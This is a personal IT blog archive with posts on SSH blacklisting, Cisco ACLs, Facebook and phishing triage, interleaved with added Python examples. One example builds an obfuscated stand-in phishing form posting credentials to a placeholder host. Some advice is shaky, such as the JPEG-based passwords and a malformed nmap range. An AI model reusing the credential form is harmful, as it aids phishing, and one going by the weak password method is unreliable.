Keybase Redux

The current ecosystem on the Internet does not want for communication or security, at least not in options for either. Where it falls short is in the popularity contest between the oldest forms of communication on the Internet and all the new ways of communicating out there. There are so many ways!

Email and web-based sites like Reddit and Facebook have all proven themselves over and over again, perhaps not quite as secure as any of us would hope, but in ubiquity of use. Everyone had to get over the hump of everyone they knew having an email address or a Facebook account. Once the novelty wore off, the security headaches appeared. Most notable is how difficult it is to get people to adopt basic security methods when dealing with email; the death and burial of PGP and GPG has left email in plaintext for anyone who has access to snoop on it.

Then a parade of other sorts of solutions exploded onto the scene: Signal, WhatsApp, Snapchat, Telegram, and Facebook Messenger. People talking to each other, sometimes privately, sometimes not. Facebook ate a little bit of Signal, but so far I haven’t seen anyone actually use it to protect their chats.

Recently I have come across another app like this, called Confide. It brings forward a lot of the features that attract me to things like Signal and Telegram, namely end-to-end security between chat partners without worrying about anyone in between eavesdropping. Confide also closes a huge privacy hole present in Snapchat: it appears to have eliminated the possibility of screenshotting the content of a message so it can leak out. This obviously has limits, because you can very well take a camera-based picture of the Confide screen and defeat the screenshot protection, but it does push that envelope further out, to where people have to perform a lot of extra steps to be clever.

Signal was the first app I saw that introduced exploding messages to this marketplace. Within the Signal app, and Confide as well I presume, you can set a lifetime counter on a message, and after the timer has expired, the message is irretrievable.

There were other solutions that came along as well, more collaborative and team-based, like Slack and Discord, services that supplanted text messages like SMS and iMessage for me, especially at work. The further along I went, the more I realized that a lot of these systems unfortunately have two big things running against them. First, they are a change in how people communicate, and change is one of the scariest things out there. Second, people are oddly resistant to actually collaborating. Quite often I am struck by the dial tone I get from folk when I attempt to explain why collaborative solutions like Google Docs and Slack/Discord are so amazing. So I pretty much make an elevator pitch and then let things lie where they land.

Enter Keybase. Originally the site appeared to be a central hub to link personal identity and personal avatars to PGP/GPG keypairs. I suppose you could affectionately regard it as trying to plug in Frankenstein’s Monster just to get a few more twitches out of the poor bastard. However just today, I received an email inviting me to check out Keybase again. They have teams, chat, files, and exploding bits that seem to mingle elements of Signal and Slack together.

What platform wins? Winning is population. When everyone collectively agrees that a solution is so good that it wins by sheer existence alone, that platform wins. Facebook tried it by manipulating human emotions and reward centers, and monetizing all our data that we wanted to share with each other. Right now the platform du jour is Facebook and the corruption of that system is starting to exact a toll on the people who use it. I have abandoned Facebook, and my life has improved. I don’t have the social reward mechanism in place any longer, but it has given me more time to read books and articles online and helped me become a happier person.

What then for these other applications and what they have to bring to the party? I have almost all of them, but use them all very sparingly. What is the point of a communications platform if you don’t know anybody who is using it? It’s the lesson learned by Google Plus in how it attempted to fight with Facebook. If the people aren’t there, then nobody is there. There is a reflection of this all the way back to the start of email as a communications mechanism. PGP/GPG was released back in the late 90s, and because it didn’t take off, it spiraled out of control and went pear-shaped when it crashed to the surface.

Only time will tell, but from what I’ve seen of Keybase, I’m pleased and intrigued. However again, without anyone to actually use this platform with, it’s just another app that I don’t use on my phone or computer.

Random Passwords: Idle Hands Are The Devils Workshop

I started toying around with the idea of capturing randomness for a source of good n-length random passwords. There are numerous PRNG and TRNG sources out there to make an endless stream of random passwords to use, so this was mostly just an effort in light curiosity.

I thought about a good “fat” source of potentially random data: what did I have on me that could generate a nice big file? My iPhone can do it, specifically the camera. However, I needed something random, so I marked up a checkerboard on a piece of paper and cut it into little squares. I put it all in a styrofoam cup and shook the daylights out of it, dumped the paper from the cup onto my desk, and spread it all out. Then I took a shot with my iPhone.

This created shot1.jpg. It’s a file with 1,893,984 bytes to it. Since the paper marks will never be in that arrangement ever again, I’d say it’s a pretty good source of randomness.

Next up, I used the shuf command to shuffle the lines of the image together. On a Mac I only had access to GNU’s coreutils via Homebrew, so for me it’s:

gshuf shot1.jpg > shot1.rnd

Then to turn the data into text, I thought about base64 encoding. The command was:

base64 -b 20 shot1.rnd > randpass1.txt

This created a text file with 126,266 lines. Since each line is a password, that’s my next 126,266 passwords. They look something like this:

Gkmd12A/IecVMjSsNnzS
45BrC+HsYh0X7VGzFnXD
gLRhg3NaF5kQAiMZHb1r
0IvqeO63YEyG7U7y0jFl
p+1Bi/Xrnj8PpWlkYX1s

Finally, with the text file handy and in a safe place, I’ll always have a nice random 20-character password on hand for quite some time.

So of course, at the end, I clean up using gshred, although on a journaled file system like HPFS on my Mac, chances are some parts of the data may hang around for a while. However, I was never seriously going into it, so technically a plain delete is good enough, but anyway:

gshred -n 3 -z -u file.ext
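The same pipeline in Python, as an added example that is not part of the original post: it reproduces the shuffle, base64 and 20-character cut described above, puts the direct CSPRNG route beside it for comparison, and adds the check a practitioner would want, a per-character entropy estimate over the resulting list. The 1 KiB blob standing in for shot1.jpg is constructed here, and the function names are mine. Note that GNU shuf draws its permutation from its own generator, seeded from the system's random source by default, so the unpredictability of the shuffled order comes from that generator rather than from the photo.

```python
import base64
import math
import secrets
import string

# The alphabet base64 emits, so constructed passwords look like the page's output.
B64_ALPHABET = string.ascii_letters + string.digits + "+/"


def shuffle_lines(blob: bytes) -> bytes:
    """Shuffle the newline-separated chunks of a blob, as `gshuf shot1.jpg` does.

    The permutation is drawn from the OS CSPRNG (secrets.SystemRandom); the blob
    only supplies bulk, and its original byte order is what gets destroyed.
    """
    lines = blob.split(b"\n")
    secrets.SystemRandom().shuffle(lines)
    return b"\n".join(lines)


def cut_base64(data: bytes, width: int = 20) -> list[str]:
    """Mirror `base64 -b 20`: encode, then wrap the text into width-character lines."""
    text = base64.b64encode(data).decode("ascii")
    return [text[i:i + width] for i in range(0, len(text), width)]


def passwords_from_blob(blob: bytes, width: int = 20) -> list[str]:
    """The page's pipeline end to end: shuffle, base64, cut into passwords."""
    return cut_base64(shuffle_lines(blob), width)


def csprng_password(width: int = 20) -> str:
    """The direct route: each character drawn uniformly from the OS CSPRNG."""
    return "".join(secrets.choice(B64_ALPHABET) for _ in range(width))


def nominal_entropy_bits(width: int, alphabet_size: int = 64) -> float:
    """Entropy of a password whose characters are uniform and independent."""
    return width * math.log2(alphabet_size)


def observed_bits_per_char(lines: list[str]) -> float:
    """Coarse Shannon estimate of bits per character over a password list.

    It only looks at single-character frequencies. Near log2(64) = 6.0 means the
    characters are roughly uniform; well below it means structure from the
    source file is leaking into the passwords.
    """
    counts: dict[str, int] = {}
    total = 0
    for line in lines:
        for ch in line:
            counts[ch] = counts.get(ch, 0) + 1
            total += 1
    if total == 0:
        return 0.0
    return -sum(c / total * math.log2(c / total) for c in counts.values())


if __name__ == "__main__":
    # Constructed stand-in for shot1.jpg: 1 KiB covering every byte value four times.
    blob = bytes(range(256)) * 4
    sample = passwords_from_blob(blob)
    print(len(sample), "passwords, first:", sample[0])
    print("nominal bits for 20 chars:", nominal_entropy_bits(20))
    print("observed bits/char from the blob:", round(observed_bits_per_char(sample), 2))
    print("CSPRNG password:", csprng_password())
```

Run it against a real file by replacing the constructed blob with `open("shot1.jpg", "rb").read()`; the observed estimate is the number to compare with the 6.0 bits per character that a 20-character base64 password needs to reach the nominal 120 bits.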


Automatic Blacklisting using iptables

My home server, an elderly Mac Mini running Debian 8, was recently exposed to the public Internet on port 22, the sshd service. I did that on purpose, so that with dynamic DNS addressing I could open a secure shell from wherever I might be, even if that’s not home.

Of course, with a port opened up like this, I have exposed this Mac Mini to the wilds of the public Internet, and it has been scanned thoroughly. When I looked at /var/log/auth.log, it was full of attempts to login using root, admin, and pi. The last one, pi, is hilarious because the hostname was never changed when the OS was migrated from running on my Raspberry Pi, so people who scan the IP and get the hostname think it’s a Raspberry Pi.

This has led to a curious exploration of how to prevent people from scanning and attempting to brute-force my sshd server running on this machine. The passwords are complex, so I’m not really worried about anyone breaking into the box, but I do want to dissuade people from even trying. So after some research, I came up with this iptables definition:

iptables -N LOGDROP
iptables -A LOGDROP -j LOG
iptables -A LOGDROP -j DROP
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
iptables -A INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 86400 --hitcount 3 -j LOGDROP

I adapted a bunch of good ideas floating around on other help pages, and these instructions are rather straightforward until the end. I found the LOGDROP chain to be really useful: it will log and then drop traffic in one call, without having to mess around with multiple log and drop jumps. The next rule keeps any current SSH shell running no matter what, then everything from loopback is accepted, and then everything from my internal network. The final sequence sets up a tracking database in the server: if someone attempts to chat up my sshd server more times than three in a day, their IP address is installed in a blacklist and their traffic is dropped.
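A log-side check of the same threshold, as an added example that is mine rather than the post's: it parses sshd lines in the /var/log/auth.log format mentioned above and applies the same sliding window the `recent` match uses, three hits within 86400 seconds, so you can see which addresses the rule would have caught and when. The sample lines, the year (syslog lines carry none) and the function names are constructed for this example. One difference to keep in mind: this counts failed logins, whereas the iptables rule counts every new connection to port 22, successful or not.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in Debian auth.log format (not taken from the page's server).
SAMPLE_AUTH_LOG = """\
Mar  3 02:14:10 minihost sshd[4021]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar  3 02:14:12 minihost sshd[4021]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar  3 02:14:15 minihost sshd[4023]: Failed password for invalid user pi from 203.0.113.7 port 51240 ssh2
Mar  3 02:20:00 minihost sshd[4031]: Failed password for invalid user admin from 198.51.100.9 port 40000 ssh2
Mar  3 08:00:00 minihost sshd[4100]: Failed password for alice from 192.0.2.10 port 52000 ssh2
Mar  3 08:00:05 minihost sshd[4100]: Accepted password for alice from 192.0.2.10 port 52000 ssh2
Mar  4 09:00:00 minihost sshd[4200]: Failed password for invalid user admin from 198.51.100.9 port 40001 ssh2
Mar  4 09:00:03 minihost sshd[4200]: Failed password for invalid user admin from 198.51.100.9 port 40001 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)


def flag_repeat_offenders(log_text, *, seconds=86400, hitcount=3, year=2018):
    """Apply the rule's sliding window to failed logins.

    Mirrors `-m recent --update --seconds 86400 --hitcount 3`: an address is
    flagged the moment it has `hitcount` hits within the last `seconds`.
    Returns {ip: timestamp of the hit that crossed the threshold}.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    flagged = {}
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        window = recent[m["ip"]]
        window.append(ts)
        while (ts - window[0]).total_seconds() > seconds:
            window.popleft()        # expired entries no longer count
        if len(window) >= hitcount and m["ip"] not in flagged:
            flagged[m["ip"]] = ts
    return flagged


def logdrop_commands(flagged):
    """Render one rule per flagged address into the page's LOGDROP chain."""
    return [f"iptables -I INPUT -s {ip} -j LOGDROP" for ip in sorted(flagged)]


if __name__ == "__main__":
    hits = flag_repeat_offenders(SAMPLE_AUTH_LOG)
    for ip, when in hits.items():
        print(f"{ip} crossed the threshold at {when:%b %d %H:%M:%S}")
    print("\n".join(logdrop_commands(hits)))
```

In the constructed data 203.0.113.7 is caught on its third failure five seconds in, while 198.51.100.9 never is: its three failures straddle more than a day, so the window never holds three at once. Widening `seconds` or lowering `hitcount` shows how the rule's two parameters trade off.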

Obviously this is overkill, and my next step is to add 2FA to PAM on this server so that I will need to enter a password and a six digit 2FA code that changes every 30 seconds and never repeats. If anyone else out there is looking for something similar to this, you’re welcome to try it out. Good luck!

Cisco SmartInstall Vulnerability Mitigation

At work, I use Cisco gear everywhere. Recently the SmartInstall Hack has become a security concern. There is a vulnerability in the SmartInstall system that allows bad actors to send arbitrary commands to your network infrastructure.

So I started out knowing how my network is shaped: I customarily keep the 10-net IP space organized by state, then by city, and then finally by kind of equipment. Out of the four octets, the first has to be 10, the second is the state, the third is the city in that state, and finally, I prefer to keep all my infrastructure gear between 250 and 254.

I started with nmap because I wanted a memory refresher so that I wouldn’t miss a device.

nmap 10.1-10.1-10.250-254

This command provides me a handy report of all the places on the inside of my network where ssh or telnet (depending on the age of the gear) reside. I print off the list, and it becomes an authoritative checklist for all my infrastructure gear.

Then, one at a time, either ssh or telnet into the infrastructure devices and paste these commands in one go:

conf t
no vstack
end
wr mem

I don’t care if the command fails; it’ll write NVRAM to Flash either way, which suits me fine. Once I was sure I got all the equipment that could be affected, I knew that at least for this vulnerability, we’re all done. There won’t be anything, at least for this, at work for me to worry over.

Now if you use vstack or SmartInstall, your mileage may vary, but I certainly don’t use it. The default is to leave it on, so the smart money is in forcing it off. Why leave it open as a vulnerability if you don’t have any chance of bad actors on your LAN? Because it is one less thing to worry over.

Starve The Beast

Finally moved all my Facebook Saved Links out to Pocket and dumped them from Facebook. Went from 600 pages liked to 300, although I think there are items on that list that Facebook is no longer revealing, and I suspect it is a bid to prevent people from using automated tapeworms to delete their Facebook account via hollowing. Leave the account in place, but dump all the guts out.

I don’t care to encourage people to do anything. The more I see how much Facebook knows about me, the more shocked I feel. That they have monetized me was always a part of the deal, but the Cambridge Analytica scandal points to a deeper corruption that runs along with the platform’s inability to admit error; it only responds when caught red-handed. If they have been corrupt all along, how far does the corruption go? How much have they sold us all for profits? Who has the data that describes us so well?

In many ways, #DeleteFacebook is a matter of bonum ira. It’s a good sort of anger that helps clean up a mess that we all have made of things. Facebook demands punishing, in a manner of speaking, and retraction of personal data is probably the only rational way to achieve that.

I don’t want to delete Facebook as much as starve it of data.

Security Notes: OpenDNS Umbrella

In my workplace, I have deployed OpenDNS Umbrella across my company network to secure and manage my DNS system. I have found that Umbrella is remarkably good at preventing unwanted behavior and protecting my corporate network from threats both outside the firewall and inside it.

All traffic destined for domain resolution must pass to two Hyper-V VMs located in my Headquarters branch. These two virtual machines handle all requests from my entire network, including the branches across the Data WAN, facilitated by the Meraki Site-to-Site VPN mesh network that the Meraki system handles for me automatically. These two VMs then pass all their collected queries to OpenDNS itself, where my policies about which Layer 7 categories I have allowed and disallowed for resolution are applied. Malware is the primary reason for Umbrella, as everything from viruses to trojan horses relies on DNS being clear as a bell so they can function in a harmful manner. Umbrella acts as a canary in a coal mine, messaging the admins about everything from Command-and-Control requests to malware requests and category violations throughout the company.

As I have been working with Umbrella, I noticed an immediate vulnerability in the way the system works. There is technically no reason why a user with a company device, or even their own, could not define their DNS servers manually and side-step Umbrella completely. Specifically, I am thinking about Google’s DNS servers at 8.8.8.8 and 8.8.4.4, although any public DNS server would work in this arrangement. It is important to include in this discussion that as an IT administrator I buck the trend against my own industry’s best practices: all users are local admins of their machines. I don’t believe in “nailing down the workstations” at all. Instead, I keep my security surface deep in the domain controller and file server, a much tighter arrangement that affords end users more liberty. With the liberty comes a risk that end users could perform some action which would ruin their day. This keeps the users responsible, and it keeps what we have to say in IT more relevant than ever. We don’t keep you from ruining your day, we help you cope. I have found that users, for the most part, treat their computers like simple tools; they don’t go poking about where they shouldn’t, and it has served me very well. Except in situations like this one, where users or malware have the inherent rights to change the DNS resolver settings if they know where to go and how to do it.

So that started me thinking about ways to address this risk and naturally I thought of the switching layer that everyone is connected to. The best place to control this is within the Cisco Catalysts themselves. It’s a matter of an ACL, an Access Control List. I poked about online and eventually came up with this solution. My two DNS resolvers are at 10.1.1.238 and 10.1.1.239 respectively:

ip access-list extended FIXDNS
!
permit udp any host 10.1.1.238 eq domain
permit udp 10.1.1.238 0.0.0.0 any eq domain
permit udp any host 10.1.1.239 eq domain
permit udp 10.1.1.239 0.0.0.0 any eq domain
permit tcp any host 10.1.1.238 eq domain
permit tcp 10.1.1.238 0.0.0.0 any eq domain
permit tcp any host 10.1.1.239 eq domain
permit tcp 10.1.1.239 0.0.0.0 any eq domain
deny tcp any any eq domain log
deny udp any any eq domain log
permit ip any any
!

This code block creates an ACL package named FIXDNS in the switch, and then on individual ports, or VLANs, or even the entire switch input flow I can affix this command and put the rule into operation:

ip access-group FIXDNS in

Obviously, I would use this in individual cases across the system, applying the limits only to end-user facing ports and skipping the trunks and support services like servers, copiers, and plotters. Being only a single command, it also makes it a snap to tear it out of ports as well, just on the off chance that I want to relax my security posture for some specific reason. I like the idea of the granularity of control this solution provides me, and I spend every day in my switching systems, so managing this is not any more work for me than usual.

I tested it in the lab as well, which is how this all got started. If the test laptop is configured to fetch its DNS settings from the DHCP pool, the users notice absolutely nothing unusual about their connection. Their DNS queries head off to OpenDNS Umbrella for resolution as normal, and everything works as it should. Acceptable traffic is allowed, while malware or banned categories are blocked. In the lab, if I set the laptop’s NIC to a specific DNS server outside my organization, like Google DNS, then any DNS-related queries do not work. As a matter of record, I have included log directives in the deny statements above, so if someone is breaking the rules, we’ll see where they are attempting to get their DNS services from and head out to correct it. Although the chances are that they would likely call us to find out why their Internet has stopped working.

I have this FIXDNS package installed on all my switches company-wide, but I haven’t actually enabled it anywhere. I think I am going to roll out the blocks very slowly and make sure that there aren’t any alarms raised at my efforts. Not that I seriously think anyone has the interest or know-how to customize their DNS resolvers, but it is nice to know that they cannot even if they tried.
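A desk check of the FIXDNS list, as an added example that is mine and not the post's: it models the eleven entries in the same order, evaluates constructed flows first-match the way IOS does, and reports which entry each flow hits and whether it would be logged. The two resolver addresses come from the post; the client addresses, the upstream address and the function names are constructed. The example also makes one caveat visible: a query sent as DNS over TLS on port 853 (or DNS over HTTPS on 443) is not port-53 traffic, so it falls through to `permit ip any any` and the list does not see it.

```python
from dataclasses import dataclass
from typing import Optional
import ipaddress


@dataclass(frozen=True)
class Ace:
    """One access-control entry, in the subset of IOS syntax the FIXDNS list uses."""
    action: str             # "permit" or "deny"
    proto: str              # "udp", "tcp" or "ip" (ip matches any protocol)
    src: str                # "any" or a single host address
    dst: str                # "any" or a single host address
    dport: Optional[int]    # destination port, None = any port
    log: bool = False


RESOLVERS = ("10.1.1.238", "10.1.1.239")   # the page's two Umbrella forwarders


def build_fixdns(resolvers=RESOLVERS):
    """The page's FIXDNS list, entry for entry and in the same order."""
    acl = []
    for proto in ("udp", "tcp"):
        for r in resolvers:
            acl.append(Ace("permit", proto, "any", r, 53))   # permit <proto> any host R eq domain
            acl.append(Ace("permit", proto, r, "any", 53))   # permit <proto> R 0.0.0.0 any eq domain
    acl.append(Ace("deny", "tcp", "any", "any", 53, log=True))
    acl.append(Ace("deny", "udp", "any", "any", 53, log=True))
    acl.append(Ace("permit", "ip", "any", "any", None))
    return acl


def _addr_matches(spec, addr):
    return spec == "any" or ipaddress.ip_address(spec) == ipaddress.ip_address(addr)


def evaluate(acl, proto, src, dst, dport):
    """First-match evaluation as IOS does it; returns (action, logged, entry index).

    Falls through to the implicit deny that ends every IOS ACL (index -1).
    """
    for i, ace in enumerate(acl):
        if ace.proto != "ip" and ace.proto != proto:
            continue
        if not _addr_matches(ace.src, src) or not _addr_matches(ace.dst, dst):
            continue
        if ace.dport is not None and ace.dport != dport:
            continue
        return ace.action, ace.log, i
    return "deny", False, -1


# Constructed flows from a user port: (label, proto, src, dst, dport).
SAMPLE_FLOWS = [
    ("DHCP-assigned resolver, plain DNS", "udp", "10.1.20.50", "10.1.1.238", 53),
    ("resolver recursing to an upstream", "udp", "10.1.1.239", "203.0.113.53", 53),
    ("hand-set Google DNS over UDP",      "udp", "10.1.20.50", "8.8.8.8", 53),
    ("hand-set Google DNS over TCP",      "tcp", "10.1.20.50", "8.8.4.4", 53),
    ("DNS over TLS to a public resolver", "tcp", "10.1.20.50", "8.8.8.8", 853),
    ("ordinary HTTPS",                    "tcp", "10.1.20.50", "203.0.113.80", 443),
]


def audit(acl=None, flows=SAMPLE_FLOWS):
    """Evaluate every sample flow against the list; returns {label: (action, logged, index)}."""
    acl = build_fixdns() if acl is None else acl
    return {label: evaluate(acl, p, s, d, port) for label, p, s, d, port in flows}


if __name__ == "__main__":
    for label, (action, logged, idx) in audit().items():
        print(f"{label:36s} -> {action:6s} entry {idx:2d}{'  (logged)' if logged else ''}")
```

The two hand-set Google DNS flows land on the logged deny entries, exactly the behaviour observed in the lab, while the port-853 flow is permitted by the final entry; if that matters in your environment it has to be addressed separately from this list.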

Crocodile Apologies

The media is starting to process the Cambridge Analytica misuse of Facebook data, and the story is only just getting some legs underneath it now. I see this as a reflective surface of the panic that we all felt back in November 2016, digging all that psychic turbulence back up again.

I want to focus more on Facebook itself. There have been several instances where Facebook has declared innocence publicly up until proof found, usually by journalists or investigators, and then when the truth comes out, Facebook stops, pauses, and issues an apology for their transgressions or mistakes. This reactivity is for me what lies at the core of my misgivings about the Facebook platform, and Facebook as a company.

In my opinion, it appears that Facebook is only chastened and contrite when caught red-handed doing something improper. I cannot trust a platform or a company that behaves this way. I honestly admit that I never really expected Facebook even to want to try to be upright and wholesome, I wanted them to, but all of this is similar to the feeling that I had when Google walked away from its mission statement “Do No Evil.” Facebook cannot be trusted.

There is no shock or surprise that Facebook has no tapeworm function available; only two options exist, leave everything alone or blow it all to kingdom come. I know there is a third path, the manual deletion of everything in the Activity Stream, but over ten years and quite a regular amount of use that is utterly impractical. Plus, I expect Facebook to be both capable of and invested in retaining my data even if I think I’ve deleted it. Just because it no longer exists on the interface to me doesn’t mean that it is gone. I thoroughly doubt that even deleted accounts get deleted. I would bet money that they get hidden from view. It would not be in Facebook’s self-interest to lose any data they can get their hands on. I would also not put it past Facebook to log every keystroke that goes into the text boxes on their site, so even if you don’t post anything, I would bet that Facebook has a record of what you did type and that you abandoned it. That they could record and store your unshared thoughts, indexing and selling them even if you didn’t share. Logging into the Facebook site itself is a personal hazard to privacy. I have no proof of this last part, but I would fully expect a company like Facebook to do this very thing.

There is little that quitting Facebook will accomplish, since human personalities are quite fixed and constant constructs. We maintain that iron grip of control and Facebook has monetized it, and now, since Cambridge Analytica, they have lost it. Pandora’s Box is open.

So why stop using Facebook then? Facebook must be caught being evil, which means that the intent is a stain that runs right to the core. I’ve abandoned Facebook itself because continued use is tacit approval of their offensive behavior, and if it makes them money through advertising revenue, and I’m a part of that? That’s personally unacceptable.

Sample Malware

Today I received a sample email that some of my coworkers caught. They asked me to look into it. The email link led to a bit.ly link, which I was able to extract, and through a clever little trick, appending a + character to the bit.ly link doesn’t load the site the link goes to but tells you about the link. This link has been clicked on about 7000 times. Already I know we’re dealing with malware, so now it’s not a question of whether it’s a rabbit hole, but rather, how deep does it go?

I pulled the bit.ly link contents out and handed it to curl on the terminal on my MacBook Pro. I don’t expect curl to do anything but show me the text of where this bit.ly link goes. It heads to a PHP file on a presumably hacked web server or blog. The PHP itself is an HTTP refresh-redirect to a Dropbox-hosted file. So I opened up my Virus Lab VM and followed where this led. The Dropbox content said it was a 1MB PDF file, but when I opened that, it led to a phishing attempt.

The phishing page had an obnoxious URL attached to it, so I pulled that out and discovered it was encoded in base64 format. I decoded that text chunk online, and it revealed a JavaScript script block formed by a single call to the document.write(unescape()) function.
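The unwrapping described above done statically in Python, as an added example that is mine and not the post's: it appends the bit.ly "+" the same way, decodes the base64 chunk, finds the document.write(unescape(...)) call and reverses JavaScript's legacy unescape() without running any script, then lists where the recovered form would post credentials. The payload is constructed here from a harmless stand-in form on a .invalid domain; it is not the sample from the post, and the function names are mine.

```python
import base64
import re
from typing import Optional
from urllib.parse import quote, unquote


def bitly_preview_url(short_url: str) -> str:
    """The page's trick: a trailing '+' makes bit.ly show link info instead of redirecting."""
    return short_url.rstrip("/") + "+"


def decode_base64_text(chunk: str) -> str:
    """Decode a base64 chunk as kits ship it: padding often stripped, sometimes URL-safe alphabet."""
    chunk = chunk.strip().replace("-", "+").replace("_", "/")
    chunk += "=" * (-len(chunk) % 4)
    return base64.b64decode(chunk).decode("utf-8", errors="replace")


def js_unescape(text: str) -> str:
    """JavaScript's legacy unescape(): %uXXXX for UTF-16 code units, then %XX as Latin-1."""
    text = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text, encoding="latin-1")


DOCWRITE_UNESCAPE = re.compile(
    r"""document\.write\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.S)


def unwrap_document_write(script: str) -> Optional[str]:
    """Recover what document.write(unescape('...')) would emit, without executing any JS."""
    m = DOCWRITE_UNESCAPE.search(script)
    return js_unescape(m.group(2)) if m else None


FORM_ACTION = re.compile(r"""<form\b[^>]*\baction\s*=\s*['"]([^'"]+)['"]""", re.I)


def unwrap_layers(payload: str) -> dict:
    """Peel base64 -> script -> unescape -> markup and list where any form posts its fields."""
    script = decode_base64_text(payload)
    markup = unwrap_document_write(script)
    return {"script": script, "markup": markup,
            "form_targets": FORM_ACTION.findall(markup or "")}


# Constructed sample (not the page's payload): a credential form wrapped as the post describes.
SAMPLE_MARKUP = ('<form action="https://phish.example.invalid/collect" method="post">'
                 '<input name="email"><input name="password" type="password"></form>')
SAMPLE_SCRIPT = ("<script>document.write(unescape('"
                 + quote(SAMPLE_MARKUP, safe="") + "'))</script>")
SAMPLE_PAYLOAD = base64.b64encode(SAMPLE_SCRIPT.encode()).decode().rstrip("=")


if __name__ == "__main__":
    print(bitly_preview_url("https://bit.ly/EXAMPLE"))   # placeholder short link
    result = unwrap_layers(SAMPLE_PAYLOAD)
    print("script :", result["script"][:60], "...")
    print("markup :", result["markup"])
    print("posts to:", result["form_targets"])
```

Keeping the decode static matters in this kind of triage: nothing in the chain is rendered or executed, so the analyst sees the credential-collection URL without the page ever running in a browser.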

Whoever it was went to great lengths to obfuscate their malware. Ultimately it led nowhere because we caught it. I find this sort of thing fascinating to pull apart, like an easy little puzzle to unravel. The phishing attempt is after an email username and password, and if someone falls for that, then thanks to people being usually lazy with passwords, once you have one password, chances are you have all of them on every other site.

Just another reason to use a password manager and have an individual password per site. If one site is breached, then the damage is limited to that one site, not all of them.

Apple’s Activation Lock

I just spent the last hour bashing my head against Apple’s Activation Lock on a coworker’s iPad 2. They brought it to me because it had nearly every assistive mode option turned on, and it was locked with an unknown iCloud account. I tried to get around the lock to no avail, even by returning the device to factory specifications. Even the factory reset ends up crashing into the Activation Lock.

It’s heartening to know that Activation Lock took the guts out of the stolen devices market for Apple mobile devices, but in this particular case it’s creating a huge headache. There is no way for me to move forward with treating this issue because the iPad only refers to its owner by a guesstimate email address, b******@gmail.com. I don’t know what this is, and there is no way for me to figure it out. So this device is pretty much bricked, and I have no choice but to send the user directly to an Apple store with the instructions to throw the device on their mercy.

If you are going to give away or sell your Apple device, make sure you TURN OFF ACTIVATION LOCK. There is no way, not even DFU-mode or Factory Reset that can defeat the lock. There are some hacks that used to work, but Apple catches on quickly and updates their iOS to close each possible hack soon after it appears.

I don’t pick a fight with Apple over this; it was a clear and present requirement that they met, it just makes dealing with this particular issue impossible for people like me to resolve. The best way around this issue is to secure each and every device with an iCloud account and write the iCloud username and password down in a very legible and memorable safe place! Without the iCloud account details or a trip to the Apple Store, the device is so much plastic, metal, and glass.